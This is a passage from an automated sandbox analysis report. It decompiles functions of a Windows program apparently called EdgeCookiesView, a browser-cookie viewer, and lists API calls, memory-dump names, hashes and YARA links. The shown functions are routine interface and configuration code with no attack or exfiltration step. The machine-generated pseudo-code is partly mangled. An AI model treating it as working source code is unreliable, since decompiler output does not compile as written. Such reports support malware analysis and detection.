OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040C2CF,00000000,00000000), ref: 0040CC13
memset.MSVCRT ref: 0040CC75
memset.MSVCRT ref: 0040CC85

Part of subcall function 0040CAF2: wcscpy.MSVCRT ref: 0040CB1B

memset.MSVCRT ref: 0040CD70
wcscpy.MSVCRT ref: 0040CD91
CloseHandle.KERNEL32(?,0040C2CF,?,?,?,0040C2CF,00000000,00000000), ref: 0040CDE7

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$wcscpy$CloseHandleOpenProcess
String ID:
API String ID: 3300951397-0
Opcode ID: 1fcad76c0bd3129941d7854f28fd29f69da4d45da8680cfa1fd3405ce168179b
Instruction ID: e16d66228f4dae7d6f5bcc77b9324eed5b76837c7fa80b75a9be3f82a58a018a
Opcode Fuzzy Hash: 1fcad76c0bd3129941d7854f28fd29f69da4d45da8680cfa1fd3405ce168179b
Instruction Fuzzy Hash: 93513C71108344EBD720EF65C884A9BBBE8FF84304F004A3EF589E6191DB75D945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004036F7, Relevance: 9.1, APIs: 6, Instructions: 106
windowCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004036F7(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				struct HWND__* _t29;
				intOrPtr* _t54;
				struct HWND__* _t61;
				struct HWND__* _t62;
				intOrPtr* _t66;
				void* _t67;
				intOrPtr* _t68;

				_t58 = __edx;
				_push(__ebx);
				_t66 = __ecx;
				E00401712( *((intOrPtr*)(__ecx + 0x10)), __edx, __ecx + 0x40, __eflags);
				_t61 = GetDlgItem( *(_t66 + 0x10), 0x40c);
				E00405700(_t61, E00406827(0x2ef), 1);
				E00405700(_t61, E00406827(0x2f0), 2);
				SendMessageW(_t61, 0x160, 0x15e, 0);
				_t62 = GetDlgItem( *(_t66 + 0x10), 0x40e);
				E00405700(_t62, E00406827(0x2f9), 1);
				E00405700(_t62, E00406827(0x2fa), 2);
				E00405700(_t62, E00406827(0x2fb), 3);
				E00405700(_t62, E00406827(0x2fc), 4);
				E00405700(_t62, E00406827(0x2fd), 5);
				SendMessageW(_t62, 0x160, 0x15e, 0);
				_t29 = GetDlgItem( *(_t66 + 0x10), 0x40f);
				_t63 = _t29;
				SendMessageW(_t29, 0x160, 0x15e, 0);
				E00405700(_t29, E00406827(0x30d), 1);
				E00405700(_t63, E00406827(0x30e), 2);
				_t54 = _t66;
				_pop(_t67);
				_t68 = _t54;
				 *((intOrPtr*)( *_t68 + 4))(1, _t67);
				 *((intOrPtr*)( *_t68 + 0x1c))();
				E00405B17(_t58,  *((intOrPtr*)(_t68 + 0x10)), 4);
				return 0;
			}

0x004036f7
0x004036f7
0x004036fa
0x00403703
0x0040371f
0x00403728
0x0040373a
0x0040374f
0x00403766
0x0040376f
0x00403781
0x00403797
0x004037a9
0x004037bf
0x004037da
0x004037e4
0x004037e6
0x004037f5
0x00403805
0x00403817
0x00403820
0x00403822
0x0040165a
0x00401660
0x00401667
0x0040166f
0x00401679

APIs

Part of subcall function 00401712: GetClientRect.USER32 ref: 0040171E
Part of subcall function 00401712: GetWindow.USER32(?,00000005), ref: 00401737
Part of subcall function 00401712: GetWindow.USER32(00000000), ref: 0040173A
Part of subcall function 00401712: GetWindow.USER32(00000000,00000002), ref: 0040174C

GetDlgItem.USER32 ref: 00403716

Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,0000000B,0040799E,00000000,00000000), ref: 00406866
Part of subcall function 00406827: LoadStringW.USER32(00000000,004120C0,00000FFF,?), ref: 004068FF
Part of subcall function 00406827: memcpy.MSVCRT ref: 0040693F

Part of subcall function 00405700: SendMessageW.USER32(?,00000143,00000000,?), ref: 00405717
Part of subcall function 00405700: SendMessageW.USER32(?,00000151,00000000,?), ref: 00405729

Part of subcall function 00406827: wcscpy.MSVCRT ref: 004068A8
Part of subcall function 00406827: wcslen.MSVCRT ref: 004068C6
Part of subcall function 00406827: GetModuleHandleW.KERNEL32(00000000,?,?,0000000B,0040799E,00000000,00000000), ref: 004068D4

SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040374F
GetDlgItem.USER32 ref: 0040375D
SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 004037DA
GetDlgItem.USER32 ref: 004037E4
SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 004037F5

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$ItemWindow$HandleModule$ClientLoadRectStringmemcpywcscpywcslen
String ID:
API String ID: 3030901043-0
Opcode ID: 1047b60b3950c8a152ac73b551837c30685554d49de1232bf18ecab51a8f137e
Instruction ID: 086a44b27e78f4b83ae4b6e77ae60044790fc96d4b444eb8a6a68cf3e2127a69
Opcode Fuzzy Hash: 1047b60b3950c8a152ac73b551837c30685554d49de1232bf18ecab51a8f137e
Instruction Fuzzy Hash: 9E21A3B6640700B7E11132625C87F3B26ACDB45B2DF42143EFB517A1C3D9BE5816256D

Uniqueness

Uniqueness Score: -1.00%

Function 00401810, Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00401810(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}

0x0040181f
0x00401836
0x00401840
0x00401848
0x00401849
0x0040184d
0x00401852
0x00401862
0x00401878

APIs

GetClientRect.USER32 ref: 0040181F
GetSystemMetrics.USER32 ref: 0040182D
GetSystemMetrics.USER32 ref: 00401839
BeginPaint.USER32(?,?), ref: 00401853
DrawFrameControl.USER32 ref: 00401862
EndPaint.USER32(?,?), ref: 0040186F

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
String ID:
API String ID: 19018683-0
Opcode ID: c8a69a874f342f7a3e97f07006a698148a3ee1bf1249d9731753e706e314068b
Instruction ID: 1a6c8e31efcae22bf085037e8d33cf81da157de282c50ef6ca12fa9021a14783
Opcode Fuzzy Hash: c8a69a874f342f7a3e97f07006a698148a3ee1bf1249d9731753e706e314068b
Instruction Fuzzy Hash: 7A01FF72900218EFDF14DFA4DD459FE7B79FB45301F000479EA11BA194DA71AA08CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0040B659, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B659(intOrPtr __ecx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void _v518;
				signed short _v520;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t46;
				void* _t64;
				intOrPtr* _t71;
				intOrPtr _t73;

				_t67 = __ecx;
				_t73 = __ecx;
				_t71 = _a8;
				_v8 = __ecx;
				if(_a4 == 0x101 &&  *((intOrPtr*)(_t71 + 8)) == 0xfffffffe &&  *((intOrPtr*)(_t71 + 0xc)) == 1) {
					_v520 = _v520 & 0x00000000;
					memset( &_v518, 0, 0x1fe);
					E00401000( &_v520, _t67, 0x41203c);
					_t46 = E00405CD2( *((intOrPtr*)(_t73 + 0x208)),  &_v520);
					_t71 = _a8;
				}
				if( *(_t71 + 4) == 0x103 &&  *((intOrPtr*)(_t71 + 8)) == 0xfffffff4) {
					_t46 = E00407DC0( *((intOrPtr*)(_t73 + 0x69c)), _t71);
					 *((intOrPtr*)(_t73 + 0x20c)) = 1;
					 *(_t73 + 0x210) = _t46;
				}
				if( *((intOrPtr*)(_t71 + 8)) == 0xfffffdee) {
					_t46 = SendMessageW( *(_t73 + 0x218), 0x423, 0, 0);
					if( *_t71 == _t46) {
						_t46 = GetMenuStringW( *(_t73 + 0x21c),  *(_t71 + 4), _t71 + 0x10, 0x4f, 0);
						 *(_t71 + 0xb0) =  *(_t71 + 0xb0) & 0x00000000;
					}
				}
				if(_a4 != 0x103) {
					L29:
					return _t46;
				} else {
					if( *((intOrPtr*)(_t71 + 8)) == 0xfffffffd) {
						_t46 = E0040B0C2(_t73);
						_t71 = _a8;
					}
					if( *((intOrPtr*)(_t71 + 8)) == 0xffffff94) {
						_t64 = 0;
						if(GetKeyState(0x10) < 0) {
							_t64 = 1;
						}
						_t46 = E00407CA2( *(_t71 + 0x10), _t67,  *((intOrPtr*)(_t73 + 0x69c)), 0, _t64);
						_t73 = _v8;
						_t71 = _a8;
					}
					_t68 =  *((intOrPtr*)(_t73 + 0x69c));
					if( *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x69c)) + 0x2f4)) != 0) {
						_t92 =  *((intOrPtr*)(_t71 + 8)) - 0xffffff4f;
						if( *((intOrPtr*)(_t71 + 8)) == 0xffffff4f) {
							_t46 = E0040824E(_t71, _t68, _t92);
						}
						if( *((intOrPtr*)(_t71 + 8)) == 0xffffff4d) {
							_t63 =  *((intOrPtr*)(_t73 + 0x69c));
							_t46 = E004081B3(_t71,  *((intOrPtr*)(_t73 + 0x69c)), 0);
							if(_t46 == 0xffffffff && ( *(_t71 + 0x10) & 0x0000000c) != 0) {
								_t46 = E004081B3(_t71, _t63, 1);
							}
							 *((intOrPtr*)(_t73 + 0x20c)) = 1;
							 *(_t73 + 0x210) = _t46;
						}
					}
					if( *((intOrPtr*)(_t71 + 8)) != 0xffffff9b) {
						goto L29;
					} else {
						_t46 = E00402D29(_t71);
						if(_t46 == 0) {
							goto L29;
						}
						_t46 = _t73 + 0x280;
						if( *_t46 != 0) {
							goto L29;
						}
						 *_t46 = 1;
						return E00401BDC(_t73, 0x402);
					}
				}
			}

0x0040b659
0x0040b66b
0x0040b66e
0x0040b671
0x0040b674
0x0040b682
0x0040b698
0x0040b6a8
0x0040b6b6
0x0040b6bb
0x0040b6be
0x0040b6c9
0x0040b6d7
0x0040b6dc
0x0040b6e6
0x0040b6e6
0x0040b6f3
0x0040b704
0x0040b70c
0x0040b71f
0x0040b725
0x0040b725
0x0040b70c
0x0040b72f
0x0040b810
0x0040b810
0x0040b735
0x0040b739
0x0040b73d
0x0040b742
0x0040b742
0x0040b749
0x0040b74d
0x0040b758
0x0040b75a
0x0040b75a
0x0040b767
0x0040b76c
0x0040b76f
0x0040b76f
0x0040b772
0x0040b77f
0x0040b781
0x0040b788
0x0040b78c
0x0040b78c
0x0040b798
0x0040b79a
0x0040b7a6
0x0040b7ae
0x0040b7bc
0x0040b7bc
0x0040b7c1
0x0040b7cb
0x0040b7cb
0x0040b798
0x0040b7d5
0x00000000
0x0040b7d7
0x0040b7e6
0x0040b7ed
0x00000000
0x00000000
0x0040b7ef
0x0040b7f8
0x00000000
0x00000000
0x0040b7fa
0x00000000
0x0040b807
0x0040b7d5

APIs

memset.MSVCRT ref: 0040B698

Part of subcall function 00405CD2: ShellExecuteW.SHELL32(?,open,?,0040F454,0040F454,00000005), ref: 00405CE8

SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 0040B704
GetMenuStringW.USER32 ref: 0040B71F
GetKeyState.USER32(00000010), ref: 0040B74F

Strings

< A, xrefs: 0040B6A3

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteMenuMessageSendShellStateStringmemset
String ID: < A
API String ID: 3550944819-1181716546
Opcode ID: c907c4734865cfa602ecd8c77a846019eba843dd06bc836bba2509596532bbff
Instruction ID: cd89550f5cd4c0fed4b6d451fcd4293cb33e7e96a54fd1b4e036968a3aaec8cf
Opcode Fuzzy Hash: c907c4734865cfa602ecd8c77a846019eba843dd06bc836bba2509596532bbff
Instruction Fuzzy Hash: 9541A570600705EBDB20AF25C8897A6B365FF50325F10863EE5796B6D1C7B9AC91CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 0040B147, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B147(void* __eax, void* __ecx, intOrPtr _a4) {
				void _v526;
				long _v528;
				short _v1050;
				long _v1572;
				intOrPtr _v1576;
				char _v1580;
				void* __ebx;
				void* __edi;
				void* __esi;
				wchar_t* _t24;
				void* _t41;
				void* _t42;

				_t41 = __ecx;
				_t42 = __eax;
				if( *((intOrPtr*)(__eax + 0x27c)) == 0) {
					_v528 = 0;
					memset( &_v526, 0, 0x208);
					E00405800( &_v528);
					_t24 = wcsrchr( &_v528, 0x2e);
					if(_t24 != 0) {
						 *_t24 = 0;
					}
					wcscat( &_v528, L".cfg");
					_v1576 = _a4;
					_v1580 = 0x410838;
					_v1572 = 0;
					_v1050 = 0;
					wcscpy( &_v1572,  &_v528);
					E0040D909( &_v1580);
					_t45 =  &_v1580;
					E00401C0A( *((intOrPtr*)(_t42 + 0x698)),  &_v1580);
					E0040196B(_t42, _t41,  &_v1580);
					return E004077F5(_t45, _t41,  *((intOrPtr*)(_t42 + 0x69c)));
				}
				return __eax;
			}

0x0040b147
0x0040b152
0x0040b15c
0x0040b16f
0x0040b176
0x0040b182
0x0040b190
0x0040b19a
0x0040b19c
0x0040b19c
0x0040b1ac
0x0040b1b4
0x0040b1c8
0x0040b1d2
0x0040b1d9
0x0040b1e0
0x0040b1ee
0x0040b1f9
0x0040b1ff
0x0040b206
0x00000000
0x0040b218
0x0040b21c

APIs

memset.MSVCRT ref: 0040B176

Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B

wcsrchr.MSVCRT ref: 0040B190
wcscat.MSVCRT ref: 0040B1AC
wcscpy.MSVCRT ref: 0040B1E0

Strings

.cfg, xrefs: 0040B1A6

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileModuleNamememsetwcscatwcscpywcsrchr
String ID: .cfg
API String ID: 3959449883-3410578098
Opcode ID: c10ae3566cda4adbb0fcd7ff867f165b55a5c0b0dedcdb095373c37a526f42fc
Instruction ID: 6b4b3dac03b364a6e9d67aab511530dcf3da6c65583dd03dece53c0e4fe42f45
Opcode Fuzzy Hash: c10ae3566cda4adbb0fcd7ff867f165b55a5c0b0dedcdb095373c37a526f42fc
Instruction Fuzzy Hash: 0611BC739016285ACB20EB65CC45ACEB37DEF48314F0041F7E518B7142E7759A958F9D

Uniqueness

Uniqueness Score: -1.00%

Function 00408E65, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00408E65(void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t30;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				_t38 = __ecx;
				E00408857(__edi, __ecx, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x34)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						_t30 =  *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x38)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x68)));
						_t38 =  *((intOrPtr*)(__edi + 0x6c));
						E0040DBDA(_t30,  *((intOrPtr*)(__edi + 0x6c)));
						_t44 =  &_v516;
						E004086F5(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x38)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x48)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x6c)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x70)));
						L0040DFD6();
						_t46 = _t46 + 0x24;
						E00408857(__edi,  *((intOrPtr*)(__edi + 0x6c)), _a4,  *((intOrPtr*)(__edi + 0x70)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x34)));
				}
				return E00408857(_t40, _t38, _a4, L"</item>\r\n");
			}

0x00408e65
0x00408e65
0x00408e79
0x00408e7e
0x00408e83
0x00408e86
0x00408e86
0x00408e9c
0x00408eb3
0x00408eb5
0x00408eb8
0x00408ec7
0x00408ecd
0x00408ed2
0x00408ed4
0x00408ed5
0x00408ed8
0x00408ed9
0x00408ede
0x00408ee3
0x00408ee6
0x00408eeb
0x00408ef6
0x00408efb
0x00408efc
0x00408f01
0x00408f13

APIs

memset.MSVCRT ref: 00408E9C

Part of subcall function 0040DBDA: memcpy.MSVCRT ref: 0040DC57

Part of subcall function 004086F5: wcscpy.MSVCRT ref: 004086FA
Part of subcall function 004086F5: _wcslwr.MSVCRT ref: 0040872D

_snwprintf.MSVCRT ref: 00408EE6

Strings

<item>, xrefs: 00408E6F
<%s>%s</%s>, xrefs: 00408ED9
</item>, xrefs: 00408F02

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 1775345501-2769808009
Opcode ID: cccc76d828ed89dcb2f0cf120a02d783cc869ebbd7d411c31fb40a59302af15a
Instruction ID: 8f4cdbf62ca08d82a34ba29bd692b6b076faad5caef0efcefbde8902b8c83394
Opcode Fuzzy Hash: cccc76d828ed89dcb2f0cf120a02d783cc869ebbd7d411c31fb40a59302af15a
Instruction Fuzzy Hash: BC11BF32A0021ABBDB11BF25CD86E997B25BF04308F00407AF945776A2C739B864DBD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040BA94, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BA94(void* __esi) {
				struct _WNDCLASSW _v44;
				struct HINSTANCE__* _t20;
				struct HWND__* _t23;

				_v44.style = 0;
				_v44.lpfnWndProc = E00401896;
				_v44.cbClsExtra = 0;
				_v44.cbWndExtra = 0;
				_v44.hInstance = GetModuleHandleW(0);
				_v44.hIcon =  *((intOrPtr*)(__esi + 0x204));
				_v44.lpszClassName = __esi + 4;
				_v44.hCursor = 0;
				_v44.hbrBackground = 0x10;
				_v44.lpszMenuName = 0;
				RegisterClassW( &_v44);
				_t20 = GetModuleHandleW(0);
				_t23 = CreateWindowExW(0, L"EdgeCookiesView", L"EdgeCookiesView", 0xcf0000, 0x80000000, 0x80000000, 0x280, 0x1e0, 0, 0, _t20, __esi);
				 *(__esi + 0x208) = _t23;
				return _t23;
			}

0x0040baa5
0x0040baa8
0x0040baaf
0x0040bab2
0x0040bab7
0x0040bac0
0x0040bac6
0x0040bacd
0x0040bad0
0x0040bad7
0x0040bada
0x0040bae1
0x0040bb05
0x0040bb0c
0x0040bb14

APIs

GetModuleHandleW.KERNEL32(00000000,74B04E00,00000000), ref: 0040BAB5
RegisterClassW.USER32 ref: 0040BADA
GetModuleHandleW.KERNEL32(00000000), ref: 0040BAE1
CreateWindowExW.USER32 ref: 0040BB05

Strings

EdgeCookiesView, xrefs: 0040BAFD, 0040BB02, 0040BB03

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule$ClassCreateRegisterWindow
String ID: EdgeCookiesView
API String ID: 2678498856-2656830938
Opcode ID: d52d2fbc62bc1a1d04585868950ee5189a48b6182fc5a22ab83782a1eaa0276c
Instruction ID: 27e191b6334208d49ef5ca2aa5ba4bd18f44ae4e1b08ed08d13d2dfcc62d9bb3
Opcode Fuzzy Hash: d52d2fbc62bc1a1d04585868950ee5189a48b6182fc5a22ab83782a1eaa0276c
Instruction Fuzzy Hash: 3A01C8B1900208AFD711DF9A8D85AFFFBFCEB88710F10402AE915F2251D7B459458BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00406DE5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00406DE5(void* __eflags, WCHAR* _a4, WCHAR* _a8, intOrPtr _a12) {
				void _v8198;
				short _v8200;
				void* _t18;

				E0040E340(0x2004, _t18);
				_v8200 = _v8200 & 0x00000000;
				memset( &_v8198, 0, 0x2000);
				GetPrivateProfileStringW(0x412e48, _a4, 0x40f454,  &_v8200, 0x1000, 0x412c38);
				if(_v8200 == 0 || _a12 != 0) {
					return WritePrivateProfileStringW(0x412e48, _a4, _a8, 0x412c38);
				} else {
					return 0;
				}
			}

0x00406ded
0x00406df2
0x00406e0a
0x00406e32
0x00406e40
0x00000000
0x00406e48
0x00000000
0x00406e48

APIs

memset.MSVCRT ref: 00406E0A
GetPrivateProfileStringW.KERNEL32 ref: 00406E32
WritePrivateProfileStringW.KERNEL32(00412E48,?,?,00412C38), ref: 00406E54

Strings

H.A, xrefs: 00406E2C
8,A, xrefs: 00406E12

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$Writememset
String ID: 8,A$H.A
API String ID: 747731527-1209539780
Opcode ID: 77254ae23b063488fbe1f1531f71c30f435901724466fd7cc02357835f3fcc14
Instruction ID: e7880ec6ba8d46fe6e1110b4845dc0794c3ddc75899781143fe08dcc0165ab72
Opcode Fuzzy Hash: 77254ae23b063488fbe1f1531f71c30f435901724466fd7cc02357835f3fcc14
Instruction Fuzzy Hash: 91F0C836501318BAEB205B11CD4DFCB3779DB54714F004471BB05B61C2D3B89A94C6AD

Uniqueness

Uniqueness Score: -1.00%

Function 004053B1, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
windowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E004053B1(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040E340(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E004052B3(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040DFD6();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}

0x004053b1
0x004053b9
0x004053bf
0x004053c3
0x004053cb
0x004053cb
0x004053d4
0x004053df
0x004053e0
0x004053e1
0x004053ec
0x004053f1
0x004053f2
0x00405413

APIs

GetLastError.KERNEL32(00000000,?,004097E7,00000000,?,?,00000001,0040BE1B,0040F454,00000000,00000000,00000000,00000000,74B04E00,?), ref: 004053C5
_snwprintf.MSVCRT ref: 004053F2
MessageBoxW.USER32(?,?,Error,00000030), ref: 0040540B

Strings

Error %d: %s, xrefs: 004053E1
Error, xrefs: 004053FC

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastMessage_snwprintf
String ID: Error$Error %d: %s
API String ID: 313946961-1552265934
Opcode ID: c128aad518d94d0d1b5362608b5f3687addf0f3260f5ed8ca175d7d1039385b6
Instruction ID: d03f13e4b5835148045d3301d553e71923c4c821524e10c745d4efb14aa9052b
Opcode Fuzzy Hash: c128aad518d94d0d1b5362608b5f3687addf0f3260f5ed8ca175d7d1039385b6
Instruction Fuzzy Hash: 7BF0277A54020866CB21A795CC01FDA73FCFB44780F0404BBBA05F3181EAB4EA488E59

Uniqueness

Uniqueness Score: -1.00%

Function 0040DB6F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 21
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040DB6F(intOrPtr _a4) {
				_Unknown_base(*)()* _t3;
				void* _t7;
				struct HINSTANCE__* _t8;

				_t7 = 0;
				_t8 = LoadLibraryW(L"shlwapi.dll");
				_t3 = GetProcAddress(_t8, "SHAutoComplete");
				if(_t3 != 0) {
					_t7 =  *_t3(_a4, 0x10000001);
				}
				FreeLibrary(_t8);
				return _t7;
			}

0x0040db76
0x0040db7e
0x0040db86
0x0040db8e
0x0040db9b
0x0040db9b
0x0040db9e
0x0040dba8

APIs

LoadLibraryW.KERNEL32(shlwapi.dll,774148C0,?,00402FB4,00000000), ref: 0040DB78
GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040DB86
FreeLibrary.KERNEL32(00000000,?,00402FB4,00000000), ref: 0040DB9E

Strings

SHAutoComplete, xrefs: 0040DB80
shlwapi.dll, xrefs: 0040DB71

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressFreeLoadProc
String ID: SHAutoComplete$shlwapi.dll
API String ID: 145871493-1506664499
Opcode ID: 87ae4be269f480ad3fc6ef5346fb091e914a06ba760325769d2b4f1956a8feb4
Instruction ID: 4ee66759be8abf9dca1a37f43ee2ec86a07497b6dee4ca36e5f36349581f2197
Opcode Fuzzy Hash: 87ae4be269f480ad3fc6ef5346fb091e914a06ba760325769d2b4f1956a8feb4
Instruction Fuzzy Hash: 3ED05B353111506BF7215736AD08EEF3AA5DFC57517050033F904E3152DB744D8A86BD

Uniqueness

Uniqueness Score: -1.00%

Function 004076F4, Relevance: 7.6, APIs: 5, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E004076F4(intOrPtr* __edi) {
				void* __esi;
				void** _t11;
				intOrPtr* _t18;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr* _t36;

				_t27 = __edi;
				 *__edi = 0x410168;
				E0040768E(__edi);
				_t31 =  *((intOrPtr*)(__edi + 0x14));
				if(_t31 != 0) {
					E00406355(_t31);
					_push(_t31);
					L0040E032();
				}
				_t32 =  *((intOrPtr*)(_t27 + 0x10));
				if(_t32 != 0) {
					E00406355(_t32);
